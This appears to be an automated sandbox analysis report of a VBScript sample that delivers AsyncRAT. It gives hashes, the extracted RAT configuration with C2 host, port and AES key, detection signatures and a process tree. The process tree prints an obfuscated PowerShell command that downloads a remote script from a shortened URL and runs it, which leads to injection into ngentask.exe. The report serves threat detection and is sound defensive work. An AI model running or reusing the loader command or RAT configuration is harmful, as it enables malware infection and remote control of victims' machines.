Analysis
- max time kernel: 66s
- max time network: 163s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 25-07-2021 06:22
Static task: static1
Behavioral task: behavioral1
- Sample: LUID618.vbs
- Resource: win7v20210408
General
- Target: LUID618.vbs
- Size: 662B
- MD5: a39f9093ecdceb92cf629cd5764dd1d2
- SHA1: 1942c681159cbbce82dc7388b0de29b984f43bd8
- SHA256: 83d832887ed1b0af95ca14e647463251f0c9660971fddb03d3959647d6faee4d
- SHA512: c18fd694af943cdc74a0679fe43214afb9c652a5e53dca386e631d765449e64bff524809ef2a7923843272dc9040a080028e4f1709eb37b95723b14443521c1a
Malware Config
Extracted
Family: asyncrat
Version: 0.5.7B
C2: newfrost.ddns.net:6666
Mutex: AsyncMutex_6SI8OkPnk
Attributes:
- aes_key: i7qGeRW2Orm1I0pgfxYOISTcRoWU7fSK
- anti_detection: false
- autorun: false
- bdos: false
- delay: Default
- host: newfrost.ddns.net
- hwid: 3
- install_file:
- install_folder: %AppData%
- mutex: AsyncMutex_6SI8OkPnk
- pastebin_config: null
- port: 6666
- version: 0.5.7B
Signatures
- suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
- Async RAT payload 2 IoCs
  Processes:
    resource                                                                     yara_rule
    behavioral2/memory/196-361-0x0000000000400000-0x0000000000412000-memory.dmp  asyncrat
    behavioral2/memory/196-362-0x000000000040C73E-mapping.dmp                    asyncrat
- Blocklisted process makes network request 4 IoCs
  Processes: powershell.exe
    flow  pid   process
    8     1172  powershell.exe
    12    1172  powershell.exe
    19    1172  powershell.exe
    20    1172  powershell.exe
- Suspicious use of SetThreadContext 1 IoCs
  Processes: powershell.exe
    description                        pid  process         target process
    PID 688 set thread context of 196  688  powershell.exe  ngentask.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses 10 IoCs
  Processes: powershell.exe, powershell.exe
    pid   process
    1172  powershell.exe
    1172  powershell.exe
    1172  powershell.exe
    688   powershell.exe
    688   powershell.exe
    688   powershell.exe
    688   powershell.exe
    688   powershell.exe
    688   powershell.exe
    688   powershell.exe
- Suspicious use of AdjustPrivilegeToken 3 IoCs
  Processes: powershell.exe, powershell.exe, ngentask.exe
    description              pid   process
    Token: SeDebugPrivilege  1172  powershell.exe
    Token: SeDebugPrivilege  688   powershell.exe
    Token: SeDebugPrivilege  196   ngentask.exe
- Suspicious use of WriteProcessMemory 18 IoCs
  Processes: WScript.exe, powershell.exe, powershell.exe
    description                       pid   process         target process
    PID 3944 wrote to memory of 1172  3944  WScript.exe     powershell.exe
    PID 3944 wrote to memory of 1172  3944  WScript.exe     powershell.exe
    PID 1172 wrote to memory of 688   1172  powershell.exe  powershell.exe
    PID 1172 wrote to memory of 688   1172  powershell.exe  powershell.exe
    PID 688 wrote to memory of 2284   688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 2284   688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 2284   688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 2248   688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 2248   688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 2248   688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 196    688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 196    688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 196    688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 196    688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 196    688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 196    688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 196    688   powershell.exe  ngentask.exe
    PID 688 wrote to memory of 196    688   powershell.exe  ngentask.exe
Processes (process tree; indentation shows parent/child depth)
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LUID618.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3x1bIxK'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps1
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
        - Suspicious use of AdjustPrivilegeToken
Downloads
- C:\Users\Public\ToT.ps1
  MD5: 8f8c2450bc9cffbd58c9f5b636352117
  SHA1: ca15532c513d81cd0ce02d15215a92cb0de02161
  SHA256: a0e4c425360270c90af50799d89a5f5c011d7108c92deeba06c8c1cf180ae4d1
  SHA512: f342b2ac3c55b3a72375526c900cf2273556d81dceab97c32e0ddc1c194fffcd3418a1348431b1e1b044784354eb9b9a8d5f6987fd4397650d693c36367ed98a
- memory/196-379-0x0000000006890000-0x0000000006891000-memory.dmp (Filesize: 4KB)
- memory/196-384-0x0000000006F40000-0x0000000006F41000-memory.dmp (Filesize: 4KB)
- memory/196-382-0x0000000006D50000-0x0000000006DDD000-memory.dmp (Filesize: 564KB)
- memory/196-381-0x0000000006900000-0x0000000006904000-memory.dmp (Filesize: 16KB)
- memory/196-380-0x0000000006990000-0x0000000006991000-memory.dmp (Filesize: 4KB)
- memory/196-373-0x0000000005000000-0x0000000005001000-memory.dmp (Filesize: 4KB)
- memory/196-378-0x0000000006710000-0x0000000006789000-memory.dmp (Filesize: 484KB)
- memory/196-383-0x0000000006EE0000-0x0000000006F39000-memory.dmp (Filesize: 356KB)
- memory/196-377-0x0000000006790000-0x0000000006791000-memory.dmp (Filesize: 4KB)
- memory/196-376-0x0000000005950000-0x0000000005951000-memory.dmp (Filesize: 4KB)
- memory/196-375-0x0000000005E50000-0x0000000005E51000-memory.dmp (Filesize: 4KB)
- memory/196-374-0x00000000058B0000-0x00000000058B1000-memory.dmp (Filesize: 4KB)
- memory/196-361-0x0000000000400000-0x0000000000412000-memory.dmp (Filesize: 72KB)
- memory/196-362-0x000000000040C73E-mapping.dmp
- memory/688-311-0x0000000000000000-mapping.dmp
- memory/688-356-0x000001DDAEF96000-0x000001DDAEF98000-memory.dmp (Filesize: 8KB)
- memory/688-355-0x000001DDC9150000-0x000001DDC915E000-memory.dmp (Filesize: 56KB)
- memory/688-350-0x000001DDAEF93000-0x000001DDAEF95000-memory.dmp (Filesize: 8KB)
- memory/688-349-0x000001DDAEF90000-0x000001DDAEF92000-memory.dmp (Filesize: 8KB)
- memory/688-336-0x000001DDC9110000-0x000001DDC9111000-memory.dmp (Filesize: 4KB)
- memory/1172-114-0x0000000000000000-mapping.dmp
- memory/1172-310-0x000002A679816000-0x000002A679818000-memory.dmp (Filesize: 8KB)
- memory/1172-127-0x000002A67BA00000-0x000002A67BA01000-memory.dmp (Filesize: 4KB)
- memory/1172-122-0x000002A679813000-0x000002A679815000-memory.dmp (Filesize: 8KB)
- memory/1172-121-0x000002A679810000-0x000002A679812000-memory.dmp (Filesize: 8KB)
- memory/1172-120-0x000002A679740000-0x000002A679741000-memory.dmp (Filesize: 4KB)